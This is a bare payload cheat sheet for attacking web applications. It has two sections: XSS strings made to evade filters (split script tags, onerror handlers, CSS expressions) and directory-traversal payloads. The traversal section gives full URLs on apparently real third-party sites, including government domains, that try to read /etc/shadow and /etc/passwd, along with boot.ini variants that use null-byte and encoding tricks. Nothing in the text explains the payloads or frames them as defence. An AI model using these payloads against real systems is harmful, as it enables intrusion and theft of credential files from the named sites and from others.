XSS
http://htmlpurifier.org/live/smoketests/xssAttacks.php
http://www.wooyun.org/whitehats/%E5%BF%83%E4%BC%A4%E7%9A%84%E7%98%A6%E5%AD%90
'';!--"<XSS>=&{()}
1 y=
<div style=width:expression(alert(/xss/))>
<div style=width:expression(prompt(937511))>
1%20onmouseover%3dprompt(920753)%20y%3d
<scr<script>ipt>alert(1)</scr<script>ipt>
<img src=d.jpg onerror=confirm(/xss/)>
style=width:expression(alert(/xss/))
<svg><s1cript>alert(/1/)</script>
———————————————————
Directory traversal
http://www.leaf520.com/bbs/viewtopic.php?f=53&t=441
http://www.ynjst.gov.cn:82/ghc/editor/down.jsp?path=../../../../../../../etc&file=shadow
http://cks.mof.gov.cn/crifs/content/docmanage/download.jspfilePath=../../../../../../../../etc/passwd/do=../../../../../../../../../../etc/passwd%00.jpg&mod=info&sort_id=6
http://www.kaixin001.com/records/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg-30.html
/../../../../../../../../../../../boot.ini%00
/../../../../../../../../../../../boot.ini
/..\../..\../..\../..\../..\../..\../boot.ini
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
\..\..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\..\..\boot.ini
/../../../../../../../../../../../boot.ini%00.html
/../../../../../../../../../../../boot.ini%00.jpg